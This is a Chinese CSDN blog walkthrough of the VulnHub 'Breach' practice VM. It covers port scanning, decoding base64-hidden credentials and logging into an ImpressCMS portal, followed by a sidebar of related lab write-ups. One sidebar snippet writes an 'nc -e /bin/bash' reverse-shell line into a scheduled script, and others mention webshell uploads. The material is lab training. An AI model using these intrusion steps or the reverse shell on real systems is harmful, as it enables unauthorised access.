breach靶机

最新推荐文章于 2023-12-31 01:46:29 发布
最新推荐文章于 2023-12-31 01:46:29 发布
阅读量391 收藏 1
点赞数 1
分类专栏: vulnerable靶机 文章标签: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Encild/article/details/121236870
版权

[2021 11 7]

目录

breach靶机

端口扫描

GetShell

breach靶机

端口扫描

  • 已知IP为192.168.110.140

直接扫描端口:

 sudo nmap -sF -p1-65535 192.168.110.140

访问80端口:

 翻译:
 Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门来提供协助。鉴于违规行为的高调性质和近乎灾难性的损失,随后对该公司进行了许多尝试。Initech 已委派由 Bill Lumbergh、CISSP 和 Peter Gibbons、C|EH、SEC+、NET+、A+ 领导的 TOP 顾问来控制违规行为并对其进行分析。
 ​
 公司几乎没有意识到这次入侵并不是技术娴熟的黑客所为,而是一位心怀不满的前员工在离职时送来的离别礼物。TOP 顾问一直在努力控制违规行为。然而,他们自己的职业道德和留下的烂摊子可能是公司的垮台。

  • 查看网页源码发现有一条base64编码的注释:

 Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo

  • 发现一条base64编码解码为:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

  • 发现还是一条base64编码,继续base64解码:

 pgibbons:damnitfeel$goodtobeagang$ta

  • 然后咱们回到刚才的网页发现单机图片会跳转到该界面:

  • 实现查看网页源码 发现有一条注释:

 <!--I'm sitting on a beach reading your email! -->

  • 依次点击可以查看的网页:

名称 作用
Home page 回到初始界面
Cake 图片
Stapler 图片
Employye portal 跳转到impresscms登录界面

  • 使用刚才base64破解出的疑似账号密码的注释发现登录成功:

账号: pgibbons
密码: damnitfeelgoodtobeagangta

最低0.47元/天 解锁文章
彘嗣
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3591
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
FBI 靶机渗透
Rex_Surprise的博客
05-10 329
fbi靶机渗透 1. 渗透过程 2. 重要信息 fbi靶机渗透1. 渗透过程 给出了IP地址为固定的192.168.110.140 而我当前上网的ip为:192.168.0.101 这里给配置电脑两个IP地址 先配置一个静态然后点高级添加一个IP地址就可以了 下面开始收集信息 用nmap扫描端口 nmap -v -A -oN /tmp/...
vlunhub系列之breach靶机
hanjinming110的博客
08-11 419
cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中,我们使用/usr/bin/tee目录,将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中,等待可执行脚本的运行。
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1265
Vulnhub靶场Breach1.0详解
vulnhub靶机渗透 Breach 1
RestoreJustice的博客
03-18 149
Tomcat后台get shell是有标准姿势的,使用哥斯拉生成jsp马,将其打成shell.zip压缩包,再将zip压缩包将扩展名改为shell.war,将war包上传部署即可.发现的问题:上传的webshell,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用,主机可能有杀软或者杀web shell工具。将图片复制到kali linux,使用strings打印各图片其中的可打印字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中。这里连接到虚拟网卡1。
Into the Breach
12-28
《Into the Breach》是一款由 Subset Games 开发并发行的策略类视频游戏,以其独特的回合制战斗机制和深度的战略元素而备受好评。游戏设定在未来的科幻世界,玩家扮演的是一支时间旅行的机甲部队,任务是保护地球免...
email-breach
04-01
电子邮件违规 包含我在进行渗透测试时个人丢弃的所有电子邮件 我已删除所有在转储中多次出现的重复电子邮件 随时欢迎您添加更多电子邮件并扩展列表。 在将重复项添加到此列表之前,请确保将其删除。...
breach:执行BREACH攻击的工具
04-28
该项目在得到了发展,因此,如果您对BREACH攻击的研究感兴趣,请确保进行检查。描述执行攻击的工具。 脚本描述违反开始攻击的主要脚本。 connect.py 嗅探TLS数据包,对TLS记录进行碎片整理并转储标头和有效负载的...
Time Breach-开源
04-26
时间突破是一款大型多人在线角色扮演游戏。 在这个世界里,所有玩家都可以创造自己的世界。 每个世界都必须像经济游戏一样进行管理。 实际上,两种类型的游戏在一个大学上是链接在一起的。
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
Breach-1.0.zip
08-21
Breach-1.0.zip
SCP-Contaiment-Breach
03-20
SCP-Contaiment-Breach
Breach:负责任地用于识别 XSS 漏洞的网络安全工具
08-03
“Breach:负责任地用于识别 XSS 漏洞的网络安全工具”指出,Breach 是一个专门设计用于检测 XSS(跨站脚本)漏洞的安全工具,它的使用方式是负责任的,这意味着它旨在帮助开发者和安全专家在不损害用户或破坏网站...
breach-parse:解析违反密码的工具
05-04
违反解析解析违反密码的工具安装安装: sudo ./install.sh 从位于以下位置的magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp://tracker....xt=urn:btih:7ffbcd8cee06
【vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1022
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2203
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
最新发布
m0_62652276的博客
12-31 1204
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
(vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4280
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值